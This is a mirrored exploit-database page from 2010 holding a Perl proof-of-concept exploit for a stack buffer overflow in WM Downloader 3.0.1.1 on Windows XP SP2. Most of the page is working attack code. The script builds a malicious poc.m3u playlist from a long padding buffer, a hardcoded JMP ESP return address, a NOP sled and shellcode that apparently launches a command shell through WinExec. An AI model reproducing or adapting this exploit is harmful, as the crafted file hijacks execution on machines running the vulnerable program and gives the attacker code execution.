Home / os / win7

[local exploits] - WM Downloader 3.0.1.1 stack buffer overfl

Posted on 19 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>WM Downloader 3.0.1.1 stack buffer overflow | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: local exploits | Exploit author: sanjeev gupta' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>===========================================
WM Downloader 3.0.1.1 stack buffer overflow
===========================================

#WM Downloader 3.0.1.1 stack buffer overflow
#Author Sanjeev Gupta san.gupta86[at]gmail.com
#Download Vulnerable application from http://en.softonic.com/s/download-free-wm-capture
#Vulnerable version WM Downloader 3.0.1.1 
#Tested on XP SP2
#Greets Puneet Jain



my $buff = &quot;x41&quot; x 26076;
my $eip = &quot;x65x82xa5x7c&quot;; #7CA58265   FFE4             JMP ESP
my $nop = &quot;x90&quot; x 12;
my $code =
&quot;xFCx33xD2xB2x30x64xFFx32x5Ax8B&quot;.
&quot;x52x0Cx8Bx52x14x8Bx72x28x33xC9&quot;.
&quot;xB1x18x33xFFx33xC0xACx3Cx61x7C&quot;.
&quot;x02x2Cx20xC1xCFx0Dx03xF8xE2xF0&quot;.
&quot;x81xFFx5BxBCx4Ax6Ax8Bx5Ax10x8B&quot;.
&quot;x12x75xDAx8Bx53x3Cx03xD3xFFx72&quot;.
&quot;x34x8Bx52x78x03xD3x8Bx72x20x03&quot;.
&quot;xF3x33xC9x41xADx03xC3x81x38x47&quot;.
&quot;x65x74x50x75xF4x81x78x04x72x6F&quot;.
&quot;x63x41x75xEBx81x78x08x64x64x72&quot;.
&quot;x65x75xE2x49x8Bx72x24x03xF3x66&quot;.
&quot;x8Bx0Cx4Ex8Bx72x1Cx03xF3x8Bx14&quot;.
&quot;x8Ex03xD3x52x68x78x65x63x01xFE&quot;.
&quot;x4Cx24x03x68x57x69x6Ex45x54x53&quot;.
&quot;xFFxD2x68x63x6Dx64x01xFEx4Cx24&quot;.
&quot;x03x6Ax05x33xC9x8Dx4Cx24x04x51&quot;.
&quot;xFFxD0x68x65x73x73x01x8BxDFxFE&quot;.
&quot;x4Cx24x03x68x50x72x6Fx63x68x45&quot;.
&quot;x78x69x74x54xFFx74x24x20xFFx54&quot;.
&quot;x24x20x57xFFxD0&quot;;

my $filename =&quot;poc.m3u&quot;;
open(FILE, &quot;&gt;$filename&quot;);
print FILE $buff.$eip.$nop.$code;
close(FILE);


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-19]</pre></body></html>

 

TOP

Malware :

Exploits :